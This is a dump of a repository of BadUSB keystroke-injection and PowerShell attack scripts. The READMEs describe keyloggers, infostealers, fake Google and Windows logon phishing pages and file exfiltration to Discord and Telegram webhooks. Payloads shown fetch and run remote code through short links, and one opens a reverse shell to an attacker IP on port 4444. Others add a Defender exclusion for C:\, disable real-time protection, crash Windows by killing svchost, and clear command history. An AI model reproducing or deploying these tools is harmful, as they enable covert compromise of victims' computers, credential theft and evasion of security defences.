├── Network-Enumeration-GUI ├── README.md └── Network-Enumeration-GUI.txt ├── GIF-Player ├── README.md ├── Gif-Player.txt └── main.ps1 ├── US-Keyboard-Layout ├── README.md ├── US-Keyboard.txt └── main.ps1 ├── Screen-to-Discord ├── README.md ├── Screenshot-to-Discord.txt └── main.ps1 ├── Screen-to-Telegram ├── README.md ├── Screenshot-to-Telegram.txt └── main.ps1 ├── Filetype-Organizer ├── README.md ├── Filetype-Organizer.txt └── main.ps1 ├── MEMZ-In-Powershell ├── memz.vbs └── MEMZ-In-Powershell.txt ├── Windows-Idiot-Prank ├── idiot.vbs ├── Windows-Idiot-Prank.txt └── main.ps1 ├── Computer-Acid ├── README.md └── Computer-ACID-Prank.txt ├── Shortcut-Spam ├── README.md ├── Desktop-Shortcut-Spam.txt └── main.ps1 ├── Wallpaper-Jumpscare ├── README.md ├── Wallpaper-Jumpscare.txt └── main.ps1 ├── Download-and-Execute ├── README.md └── Download-Execute.txt ├── Clean-History ├── README.md ├── main.ps1 └── Clean-History.txt ├── File-Monitor-to-Discord ├── README.md ├── File-Changes-to-Discord.txt └── main.ps1 ├── Mouse-Monitor-to-Discord ├── README.md ├── Mouse-Activity-to-Discord.txt └── main.ps1 ├── Social-Search-GUI ├── README.md └── Username-Search-GUI.txt ├── Discord-Infostealer ├── README.md └── System-Info-to-Discord.txt ├── Webhook-Spammer-GUI ├── README.md └── Webhook-Spammer-GUI.txt ├── Browser-History-to-Discord ├── README.md ├── Browser-History-to-Discord.txt └── main.ps1 ├── Exfiltrate-to-Discord ├── README.md ├── Exfiltrate-to-Discord.txt └── main.ps1 ├── Google-Phishing ├── README.md └── Google-Phish-to-Discord.txt ├── Wifi-Networks-to-Discord ├── README.md ├── Discord-WiFi-Grabber.txt └── main.ps1 ├── Record-Screen-GUI ├── README.md └── Record-Screen-GUI.txt ├── Win10-Phishing ├── README.md └── Fake-Windows-10-Logon.txt ├── Win11-Phishing ├── README.md └── Fake-Windows-11-Logon.txt ├── Telegram-Keylogger ├── README.md ├── Keylogger-to-Telegram.txt └── main.ps1 ├── Tools ├── Webhook-Test-Tool.txt ├── Add Exclusion C-drive.txt ├── Downgrade-PS-Win11.txt ├── 
Disable RT-Protection through GUI.txt ├── Anti-AFK-Tool.txt ├── Update Windows in Powershell.txt ├── Download-Execute from Run Prompt.txt ├── Set US Keyboard & System Language.txt ├── Clean-Command-History.txt └── Base64 Decode & Execute.txt ├── Discord-Keylogger ├── README.md ├── Keylogger-to-Discord.txt └── main.ps1 ├── Pranks ├── Invoke BSOD.txt ├── ScreenParty.txt ├── Computer-ACID-Prank.txt ├── Start Windows-93 (parody edition).txt ├── System Message.txt ├── 5 second Screen Kill.txt ├── Disable-Keyboard-Mouse-120s.txt ├── Persisant-Goose.txt ├── Kill I-O Devices.txt ├── Mute-Button-Spam.txt ├── Change-System-Sounds.txt ├── USB-SoundSwap.txt ├── Invoke Fake Update (.vbs).txt ├── Dsktop Shortcut Spammer.txt ├── Rickroll with Max Volume spam.txt ├── Change Wallpaper.txt ├── Blank Image to Discord Spammer.txt ├── Mario-BSOD.txt └── Hydra-in-Powershell.txt ├── Netcat-Screenshare ├── README.md ├── Desktop Screenshare over Netcat.txt └── main.ps1 ├── Beigeworms-Tool-Suite ├── README.md └── Beigeworms-Tool-Suite.txt ├── Exfiltrate-to-Telegram ├── README.md ├── Exfiltrate-to-Telegram.txt └── main.ps1 ├── Console-QRcode ├── Console-QRcode.txt └── main.ps1 ├── Netcat-Client ├── main.ps1 ├── README.md └── Simple-Netcat-Client.txt ├── Telegram-Infostealer ├── README.md └── System-Info-to-Telegram.txt ├── Exfiltrate-to-USB ├── README.md ├── Exfiltrate-to-USB.txt └── main.ps1 ├── LAN-Tools ├── README.md └── LAN-Tools.txt ├── Exfiltrate-to-Dropbox ├── README.md ├── Exfiltrate-to-Dropbox.txt └── main.ps1 ├── Global-PS-Trascription-to-Discord └── Global-PS-Trascript-to-DC.txt ├── Webcam-to-Discord ├── Webcam-to-Discord.txt └── main.ps1 ├── Image-to-Console ├── Image-to-Console.txt └── main.ps1 ├── Speech-to-Discord ├── Speech-to-Discord.txt └── main.ps1 ├── Chrome-Extension-Keylogger ├── README.md ├── Chrome-Extension-Keylogger.txt └── main.ps1 ├── Record-Screen-to-Discord ├── Record-Screen-to-Discord.txt └── main.ps1 ├── USB-Poison ├── USB-Poison.txt └── main.ps1 ├── 
Record-Mic-to-Discord ├── Record-Mic-to-Discord.txt └── main.ps1 ├── Mouse-Clicks-Recorder └── Mouse-Clicks-Recorder.txt ├── Uvnc-Remote-Desktop ├── Uvnc-Remote-Desktop.txt └── main.ps1 ├── Voice-Activated-DarkMode ├── Voice-Activated-DarkMode.txt └── main.ps1 ├── OSINT ├── Discord WiFi Grabber 2.txt ├── Discord WiFi Grabber.txt ├── Speech-to-Discord.txt.txt ├── Record-Screen-to-Discord.txt.txt ├── Installed Programs and Eventlogs to File.txt ├── Exfiltrate files to DropBox.txt ├── Screenshot to Telegram.txt ├── Exfiltrate files to Discord.txt ├── Exfiltrate Files to USB Drive.txt ├── Google Login Phish to Discord.txt ├── Record-Mic-to-Discord.txt.txt ├── Keylogger to Discord.txt ├── Desktop Screenshare over Netcat.txt ├── Keylogger from base64 to Discord.txt ├── Exfiltrate files to Telegram.txt ├── Email System & User Information.txt ├── Desktop Screenshare over LAN.txt └── Email System Info with Screenshot.txt ├── Chrome-DB-to-Discord ├── Chrome-DB-to-Discord.txt └── main.ps1 ├── Discord-Media-Hog ├── Discord-Media-Hog.txt └── readme.md ├── Unsaved-Notepad-to-Discord ├── Notepad-Tabs-to-Discord.txt └── main.ps1 ├── BadUSB-Detect-and-Protect ├── README.md └── BadUSB-Detect-and-Protect.txt ├── Discord-C2 ├── Discord C2 Client.txt └── README.md ├── Discord-Reverse-Shell └── Discord-Reverse-Shell.txt ├── Reverse Shells and C2 ├── Simple NetCat Client.txt └── Telegram Reverse Shell.txt └── README.md /Network-Enumeration-GUI/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Network Enumeration GUI

3 | 4 | SYNOPSIS 5 | 6 | This script creates a GUI window for enumerating devices on the local network. 7 | -------------------------------------------------------------------------------- /GIF-Player/README.md: -------------------------------------------------------------------------------- 1 | 2 |

GIF Player in Powershell

3 | 4 | SYNOPSIS 5 | 6 | This Script downloads a GIF from Giphy and plays it in a GUI window. 7 | 8 | USAGE 9 | 10 | 1. Run this script in powershell 11 | -------------------------------------------------------------------------------- /US-Keyboard-Layout/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Set US Keyboard Layout

3 | 4 | SYNOPSIS 5 | 6 | This script changes the keyboard layout and system language to US. 7 | 8 | USAGE 9 | 10 | 1. Run the script on a target system -------------------------------------------------------------------------------- /Screen-to-Discord/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Screenshot to Discord

3 | 4 | SYNOPSIS 5 | 6 | Takes a screenshot of the desktop and posts to a discord webhook. 7 | 8 | SETUP 9 | 10 | 1. replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 11 | -------------------------------------------------------------------------------- /Screen-to-Telegram/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Screenshot to Telegram

3 | 4 | SYNOPSIS 5 | 6 | Takes a screenshot of the desktop and posts to a Telegram bot chat. 7 | 8 | SETUP 9 | 10 | 1. replace TELEGRAM_TOKEN_HERE with your Telegram token. 11 | -------------------------------------------------------------------------------- /Filetype-Organizer/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Search Folders For Filetypes

3 | 4 | SYNOPSIS 5 | 6 | Searches User folder for any files with specific filetype and copies them. 7 | 8 | USAGE 9 | 10 | 1. Run Script. 11 | 2. follow instructions in the console. -------------------------------------------------------------------------------- /MEMZ-In-Powershell/memz.vbs: -------------------------------------------------------------------------------- 1 | Set WshShell = WScript.CreateObject("WScript.Shell") 2 | WScript.Sleep 200 3 | WshShell.Run "powershell.exe -Ep Bypass -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/MEMZ-In-Powershell/main.ps1 | i`ex", 0, True 4 | 5 | -------------------------------------------------------------------------------- /Windows-Idiot-Prank/idiot.vbs: -------------------------------------------------------------------------------- 1 | Set WshShell = WScript.CreateObject("WScript.Shell") 2 | WScript.Sleep 200 3 | WshShell.Run "powershell.exe -Ep Bypass -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Windows-Idiot-Prank/main.ps1 | i`ex", 0, True 4 | 5 | -------------------------------------------------------------------------------- /Computer-Acid/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Computer Acid Prank

3 | 4 | SYNOPSIS 5 | 6 | this script generates GDI effects (VISUAL EFFECTS) on the desktop 7 | (lasts for 90 seconds before returning to normal) 8 | 9 | USAGE 10 | 11 | 1. Run script with powershell -------------------------------------------------------------------------------- /Shortcut-Spam/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Simple Shortcut Bomb

3 | 4 | 5 | SYNOPSIS 6 | 7 | This script will create 200 shortcuts on the desktop very quickly. 8 | 9 | USAGE 10 | 11 | 1. Change '100' to the number of shortcuts you want created 12 | 2. Run the script. -------------------------------------------------------------------------------- /Wallpaper-Jumpscare/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Simple Wallpaper Changer

3 | 4 | SYNOPSIS 5 | 6 | This script will download an image from the web and set it as the wallpaper. 7 | 8 | USAGE 9 | 10 | 1. Change DIRECT IMAGE LINK HERE to your URL. 11 | 2. Run the script. 12 | -------------------------------------------------------------------------------- /Download-and-Execute/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Download and Execute exe files

3 | 4 | SYNOPSIS 5 | 6 | Uses the Run Prompt to download a file and run it. 7 | 8 | USAGE 9 | 10 | replace FILE_URL_HERE with the url of your file to run. 11 | Run script on target Windows system. 12 | -------------------------------------------------------------------------------- /Clean-History/README.md: -------------------------------------------------------------------------------- 1 | 2 |

History Cleaner

3 | 4 | SYNOPSIS 5 | Empty the temp folder and recycle bin, clear run box and powershell history. 6 | 7 | USAGE 8 | 1. Run the script 9 | 10 | CREDIT 11 | this code was pulled from I-Am-Jakoby's recon script. 12 | 13 | #> 14 | -------------------------------------------------------------------------------- /File-Monitor-to-Discord/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Filesystem Monitor to Discord

3 | 4 | SYNOPSIS 5 | 6 | This script gathers information about any changes to any files in the "%USERPROFILE%" folder. 7 | 8 | USAGE 9 | 2. Run Script on target System 10 | 3. Check temp folder for results 11 | -------------------------------------------------------------------------------- /Mouse-Monitor-to-Discord/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Mouse Monitor to Discord

3 | 4 | SYNOPSIS 5 | 6 | This script gathers information about any mouse movement and idle time and sends info to Discord. 7 | 8 | USAGE 9 | 10 | 2. Run Script on target System 11 | 3. Check Discord for results 12 | -------------------------------------------------------------------------------- /Social-Search-GUI/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Social Search GUI

3 | 4 | SYNOPSIS 5 | 6 | This script presents a GUI for searching popular websites with a single username. 7 | 8 | USAGE 9 | 10 | 1. Run script with powershell 11 | 2. Input your desired username 12 | 3. Press "Start Search" 13 | -------------------------------------------------------------------------------- /Discord-Infostealer/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Discord System InfoStealer

3 | 4 | SYNOPSIS 5 | 6 | This script gathers system information and posts to Discord Webhook with the results. 7 | 8 | SETUP INSTRUCTIONS 9 | 10 | 4. Replace DISCORD_WEBHOOK with your webhook 11 | 5. Run Script on target System 12 | -------------------------------------------------------------------------------- /Webhook-Spammer-GUI/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Discord Spammer With GUI

3 | 4 | SYNOPSIS 5 | 6 | Creates a GUI with functionality to spam a webhook with text or an image. 7 | 8 | USAGE 9 | 10 | 1. Run script with powershell 11 | 2. Input ip Range and select additional parameters 12 | 3. Press "Start Scan" 13 | -------------------------------------------------------------------------------- /Browser-History-to-Discord/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Browser History and Bookmarks to Discord

3 | 4 | SYNOPSIS 5 | 6 | Gathers History and Bookmarks data from database files and sends it to discord 7 | 8 | USAGE 9 | 10 | 1. Replace YOUR_WEBHOOK_HERE with your Discord webhook. 11 | 2. Run the script and check Discord for results. -------------------------------------------------------------------------------- /Exfiltrate-to-Discord/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Exfiltrate Files to Discord

3 | 4 | SYNOPSIS 5 | 6 | This script searches the user folders for specific filetypes to upload to Discord zipped. 7 | 8 | SETUP 9 | 10 | Create a webhook in a discord server channel settings. 11 | Replace WEBHOOK_HERE with your webhook. 12 | 13 | -------------------------------------------------------------------------------- /Google-Phishing/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Google Sign in to Discord

3 | 4 | SYNOPSIS 5 | 6 | Uses Powershell and HTML to create a fake google login page which catches login credentials and sends them to a webhook. 7 | 8 | USAGE 9 | 10 | 1. Replace YOUR_WEBBHOOK_HERE with your webhook 11 | 2. Run script on target system. 12 | -------------------------------------------------------------------------------- /Wifi-Networks-to-Discord/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Saved Wifi Networks to Discord

3 | 4 | SYNOPSIS 5 | 6 | This script gathers WiFi information and posts to a discord webhook address with the results. 7 | 8 | USAGE 9 | 10 | 1. Input your credentials below 11 | 2. Run Script on target System 12 | 3. Check Discord for results 13 | 14 | -------------------------------------------------------------------------------- /Record-Screen-GUI/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Screen Recorder GUI

3 | 4 | SYNOPSIS 5 | 6 | A customizable gui for screen recording with ffmpeg.exe 7 | 8 | USAGE 9 | 10 | 1. Run script. 11 | 2. in GUI click 'Get ffmpeg.exe' 12 | 3. input desired variables and click start 13 | 4. Timestamped output file will be in the same folder as the script. 14 | -------------------------------------------------------------------------------- /Win10-Phishing/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Fake Windows Logon Screen to Discord Webhook

3 | 4 | 5 | SYNOPSIS 6 | 7 | This script kills all Edge and Chrome processes, starts the screensaver and opens Edge in fullscreen with a page that asks for login info and posts the results to a Discord webhook. 8 | 9 | USAGE 10 | 11 | 1. Replace YOUR_WEBBHOOK_HERE with your webhook. 12 | 2. Run script on target system. 13 | -------------------------------------------------------------------------------- /Win11-Phishing/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Fake Windows Logon Screen to Discord Webhook

3 | 4 | 5 | SYNOPSIS 6 | 7 | This script kills all Edge and Chrome processes, starts the screensaver and opens Edge in fullscreen with a page that asks for login info and posts the results to a Discord webhook. 8 | 9 | USAGE 10 | 11 | 1. Replace YOUR_WEBBHOOK_HERE with your webhook. 12 | 2. Run script on target system. 13 | -------------------------------------------------------------------------------- /Telegram-Keylogger/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Keylogger To Telegram Chat

3 | 4 | SYNOPSIS 5 | 6 | This script connects target computer with a telegram chat to capture keystrokes. 7 | 8 | SETUP INSTRUCTIONS 9 | 10 | 1. visit https://t.me/botfather and make a bot. 11 | 2. add bot api to script. 12 | 3. search for bot in top left box in telegram and start a chat then type /start. 13 | 5. Run Script on target System 14 | -------------------------------------------------------------------------------- /Tools/Webhook-Test-Tool.txt: -------------------------------------------------------------------------------- 1 | REM Title: Webhook Test Tool 2 | REM Author: @beigeworm 3 | REM Description: This script sends a test message a webhook url from run-prompt 4 | REM Target: Windows 10 , 11 5 | 6 | DELAY 1000 7 | GUI r 8 | DELAY 750 9 | STRING powershell -Ep Bypass $b = @{\"content\" = \"WORKING!\"} | ConvertTo-Json; IRM 'https://discord.com/api/webhooks/REPLACE_WITH/YOUR_WEBHOOK' -Me Post -Co 'application/json' -B $b 10 | ENTER -------------------------------------------------------------------------------- /Discord-Keylogger/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Keylogger To Discord Webhook

3 | 4 | 5 | SYNOPSIS 6 | 7 | This script gathers Keypress information and posts to a discord webhook address with the results only 8 | when the keyboard is inactive for more than 10 seconds and only if keys were pressed before that. 9 | 10 | USAGE 11 | 12 | 1. Input your credentials below 13 | 2. Run Script on target System 14 | 3. Check Discord for results 15 | -------------------------------------------------------------------------------- /Clean-History/main.ps1: -------------------------------------------------------------------------------- 1 | # Delete contents of Temp folder 2 | 3 | rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue 4 | 5 | # Delete run box history 6 | 7 | reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f 8 | 9 | # Delete powershell history 10 | 11 | Remove-Item (Get-PSreadlineOption).HistorySavePath 12 | 13 | # Deletes contents of recycle bin 14 | 15 | Clear-RecycleBin -Force -ErrorAction SilentlyContinue -------------------------------------------------------------------------------- /Pranks/Invoke BSOD.txt: -------------------------------------------------------------------------------- 1 | REM Title: Invoke BSOD 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: This will open powershell and cause a blue screen. 4 | REM Target: Windows 10 5 | 6 | REM ***This is a dangerous script - Be Careful!!!*** 7 | 8 | REM some setup for dukie script. 9 | DEFAULT_DELAY 100 10 | 11 | DELAY 1000 12 | GUI r 13 | DELAY 750 14 | STRING cmd /c taskkill /f /im svchost.exe 15 | CTRL-SHIFT ENTER 16 | DELAY 2500 17 | ALT y 18 | -------------------------------------------------------------------------------- /Netcat-Screenshare/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Desktop Screenshare Over Netcat

3 | 4 | SYNOPSIS 5 | 6 | Starts a video stream of the desktop to a netcat session (the output is viewed in a browser). 7 | 8 | USAGE 9 | 10 | Run script on target Windows system. 11 | On a Linux box use this command > nc -lvnp 9000 | nc -lvnp 8080 12 | Then in a Firefox browser go to > http://localhost:8080 13 | 14 | (Firefox is the only browser that supports the codec for the video stream.) -------------------------------------------------------------------------------- /Beigeworms-Tool-Suite/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Beigeworm's Toolset GUI

3 | 4 | SYNOPSIS 5 | 6 | All useful tools in one place. 7 | A selection of Powershell tools from this repo can be ran from this script. 8 | 9 | USAGE 10 | 11 | 12 | 1. Run the script and follow options in the GUI 13 | 14 | INFO 15 | 16 | Closing this script will NOT close any scripts that were started from this script. 17 | Any background/hidden scripts eg. C2 clients will keep running. 18 | -------------------------------------------------------------------------------- /Exfiltrate-to-Telegram/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Exfiltrate Files to Telegram

3 | 4 | SYNOPSIS 5 | 6 | This script connects target computer with a telegram chat to upload certain files to telegram . 7 | 8 | SETUP INSTRUCTIONS 9 | 10 | 1. visit https://t.me/botfather and make a bot. 11 | 2. add bot api to script. 12 | 3. search for bot in top left box in telegram and start a chat then type /start. 13 | 4. Replace TELEGRAM_TOKEN with your token 14 | 5. Run Script on target System -------------------------------------------------------------------------------- /Console-QRcode/Console-QRcode.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: beigeworm's QR code to console. 3 | REM Author: @beigeworm 4 | REM Description: Uses Powershell to display a generated QR code from text or a URL 5 | REM Target: Windows 10 and 11 6 | 7 | REM SETUP 8 | REM Replace https://beigeworm.com with your url ot text string. 9 | 10 | DEFAULT_DELAY 100 11 | 12 | DELAY 1000 13 | GUI r 14 | DELAY 750 15 | STRING powershell -Ep Bypass -C $txt = 'https://beigeworm.com'; irm is.gd/bw0psqrcode | iex 16 | ENTER 17 | -------------------------------------------------------------------------------- /Netcat-Client/main.ps1: -------------------------------------------------------------------------------- 1 | 2 | do{ 3 | $v = 4 4 | $a = New-Object S`ySt`em.N`eT.`s`ock`eTs.TC`PC`li`eNt("$ip",4444) 5 | $b = $a.GetStream();[byte[]]$c = 0..65535|%{0} 6 | while(($d = $b.Read($c, 0, $c.Length)) -ne 0){ 7 | $e = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($c,0, $d) 8 | $f = (iex $e 2>&1 | Out-String );$g = $f + (pwd).Path + '> ' 9 | $h = ([text.encoding]::ASCII).GetBytes($g) 10 | $b.Write($h,0,$h.Length) 11 | $b.Flush()} 12 | $a.Close() 13 | Sleep 10 14 | }while ($v -le 5) 15 | -------------------------------------------------------------------------------- /Telegram-Infostealer/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Telegram System InfoStealer

3 | 4 | SYNOPSIS 5 | 6 | This script gathers system information and posts to Telegram Bot Chat with the results. 7 | 8 | SETUP INSTRUCTIONS 9 | 10 | 1. visit https://t.me/botfather and make a bot. 11 | 2. add bot api to script. 12 | 3. search for bot in top left box in telegram and start a chat then type /start. 13 | 4. Replace YOUR_BOT_TOKEN_FOR_TELEGRAM with your bot token 14 | 5. Run Script on target System 15 | -------------------------------------------------------------------------------- /Netcat-Client/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Simple Netcat Client

3 | 4 | SYNOPSIS 5 | 6 | Opens a netcat connection to a Windows machine in Powershell 7 | 8 | USAGE 9 | 10 | 1. Download Ncat For windows. https://nmap.org/download#windows 11 | 2. Change "YOUR IP HERE" to the attacker machine's ipv4 address (find using ipconfig on windows) 12 | 3. Open a terminal on the attacker machine and type "nc -lvp 4444" 13 | 4. Run this script on the client machine. 14 | 15 | NOTE 16 | 17 | The PORT number is 4444 -------------------------------------------------------------------------------- /Pranks/ScreenParty.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: Screen Party 3 | REM Author: @beigeworm 4 | REM Description: Uses Powershell to display a form with changing colors 5 | REM Target: Windows 10 and 11 6 | 7 | REM some setup for dukie script 8 | DEFAULT_DELAY 100 9 | 10 | REM open powershell (remove "-W H" to show the window) 11 | DELAY 1000 12 | GUI r 13 | DELAY 750 14 | STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/Powershell-Tools-and-Toys/main/Pranks/Screen-Party.ps1 | iex 15 | ENTER -------------------------------------------------------------------------------- /Exfiltrate-to-USB/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Exfiltrate Files to USB

3 | 4 | SYNOPSIS 5 | 6 | Waits for a new USB Storage device to be connected and then copies many user files to that USB drive. 7 | 8 | USAGE 9 | 10 | 1. Run the script. 11 | 2. Choose if you want to hide the console window (silent mode) 12 | 3. Connect a USB Drive to the computer 13 | 4. Copying files will automatically begin to the newly connected drive 14 | 5. 'Completed' message will appear when finished (hidden mode only) 15 | 16 | -------------------------------------------------------------------------------- /LAN-Tools/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Beigeworm's Powershell LAN Toolset

3 | 4 | MAIN SCRIPT HERE - https://github.com/beigeworm/Posh-LAN 5 | 6 | SYNOPSIS 7 | 8 | Start up a HTTP server and run a selection of Local Area Network Tools using Powershell. 9 | 10 | USAGE 11 | 12 | 1. Run this script on target computer and note the URL provided 13 | 2. on another device on the same network, enter the provided URL in a browser window 14 | 15 | NOTE 16 | 17 | This script will need Admin privaleges to run properly. 18 | -------------------------------------------------------------------------------- /Tools/Add Exclusion C-drive.txt: -------------------------------------------------------------------------------- 1 | REM Title: Add Exclusion C-drive 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses Powershell to add an exclusion to Windows Defender to ingore any files within C:/ 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script. 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove -W Hidden to show the window). 10 | GUI r 11 | DELAY 750 12 | STRING powershell -Exec Bypass -C Add-MpPreference -ExclusionPath C:\ 13 | CTRL-SHIFT ENTER 14 | DELAY 2500 15 | ALT y 16 | -------------------------------------------------------------------------------- /Tools/Downgrade-PS-Win11.txt: -------------------------------------------------------------------------------- 1 | REM Title: Windows 11 Terminal Downgrade 2 | REM Description: Downgrade the default command prompt of Windows 11 to use Conhost again. Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again. 
3 | REM Target: Windows 11 4 | 5 | DELAY 500 6 | GUI r 7 | DELAY 500 8 | STRING powershell -Ep Bypass -C $k='HKCU:\Console\%%Startup';$v='{B23D10C0-E52E-411E-9D5B-C09FDF709C7D}';Set-ItemProperty $k -N DelegationConsole -V $v;Set-ItemProperty $k -N DelegationTerminal -V $v 9 | DELAY 500 10 | ENTER 11 | -------------------------------------------------------------------------------- /US-Keyboard-Layout/US-Keyboard.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's Keyboard Language changer. 2 | REM Author: @beigeworm 3 | REM Description: This script changes the keyboard layout and system language to US. 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove "-W H" to show the window) 10 | DELAY 1000 11 | GUI r 12 | DELAY 750 13 | STRING powershell -ep bypass -w h -c cd $env:temp; irm is.gd/6hrsg4r > run.ps1; & run.ps1; sleep 1; rm run.ps1 -force 14 | ENTER 15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /Tools/Disable RT-Protection through GUI.txt: -------------------------------------------------------------------------------- 1 | REM Title: Disable Real-Time Protection 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Manually opens Windows Security window and turns offf Real-Time Protection. 4 | REM Target: Windows 10 5 | 6 | 7 | REM some setup for dukie script. 8 | DEFAULT_DELAY 100 9 | 10 | REM open Windows Security GUI. 11 | GUI r 12 | DELAY 1000 13 | STRING windowsdefender://threatsettings 14 | ENTER 15 | DELAY 5000 16 | SPACE 17 | DELAY 3000 18 | ALT y 19 | DELAY 1000 20 | ALT F4 21 | 22 | -------------------------------------------------------------------------------- /Exfiltrate-to-Dropbox/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Exfiltrate Files to Dropbox

3 | 4 | SYNOPSIS 5 | 6 | Uses Powershell to Exfiltrate all files of all specified filetypes to a DropBox account. 7 | 8 | SETUP 9 | 10 | make an app at https://www.dropbox.com/developers/apps (make sure to grant full access to your new app) 11 | generate an access token for your app and replace DROPBOX_ACCESS_TOKEN_HERE. 12 | 13 | USAGE 14 | 15 | 1. Input your credentials below 16 | 2. Run Script on target System 17 | 3. Check Discord for results 18 | 19 | #> -------------------------------------------------------------------------------- /GIF-Player/Gif-Player.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's GIF Player. 2 | REM Author: @beigeworm 3 | REM Description: This script changes downlaods a rick and morty GIF and plays it in a GUI window. 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove "-W H" to show the window) 10 | DELAY 1000 11 | GUI r 12 | DELAY 750 13 | STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/GIF-Player/main.ps1 | iex 14 | ENTER 15 | 16 | 17 | -------------------------------------------------------------------------------- /Pranks/Computer-ACID-Prank.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's GDI Effects Prank. 2 | REM Author: @beigeworm 3 | REM Description: This script uses GDI effects on the users display to create visual effects for 90 seconds. 
4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove "-W H" to show the window) 10 | DELAY 1000 11 | GUI r 12 | DELAY 750 13 | STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/GDI-haunter.ps1 | iex 14 | ENTER 15 | 16 | 17 | -------------------------------------------------------------------------------- /Windows-Idiot-Prank/Windows-Idiot-Prank.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: Windows Idiot Prank 3 | REM Author: @beigeworm 4 | REM Description: This script recreates the Windows idiot virus in powershell 5 | REM Target: Windows 10 6 | 7 | REM some setup for dukie script 8 | DEFAULT_DELAY 100 9 | 10 | REM open powershell (remove -W Hidden to show the window) 11 | DELAY 1000 12 | GUI r 13 | DELAY 750 14 | STRING powershell -Ep Bypass -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Windows-Idiot-Prank/main.ps1 | iex 15 | ENTER 16 | 17 | 18 | -------------------------------------------------------------------------------- /Shortcut-Spam/Desktop-Shortcut-Spam.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's Desktop Shortcut Spammer. 2 | REM Author: @beigeworm 3 | REM Description: This script creates 100 shortcuts on the users Desktop. 
REM Target: Windows 10

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Shortcut-Spam/main.ps1 | iex
ENTER

--------------------------------------------------------------------------------
/Global-PS-Trascription-to-Discord/Global-PS-Trascript-to-DC.txt:
--------------------------------------------------------------------------------
REM Title: Global PS Transcription to Discord
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Log all powershell input and output to a discord webhook
REM Target: Windows 10, 11

REM some setup for dukie script.
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window).
GUI r
DELAY 750
STRING powershell -W H -Ep Bypass -C $dc = 'YOUR_WEBHOOK_HERE'; irm is.gd/bw0pstrtodc | iex
CTRL-SHIFT ENTER
DELAY 2500
ALT y

--------------------------------------------------------------------------------
/LAN-Tools/LAN-Tools.txt:
--------------------------------------------------------------------------------
REM Title: beigeworm's LAN Tools
REM Author: @beigeworm
REM Description: Start up a HTTP server and run a selection of Local Area Network Tools using Powershell.
REM NOTE - This script will need Admin privileges to run properly.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -C irm https://raw.githubusercontent.com/beigew0rm/Posh-LAN/main/Posh-LAN-Tools.ps1 | iex
ENTER

--------------------------------------------------------------------------------
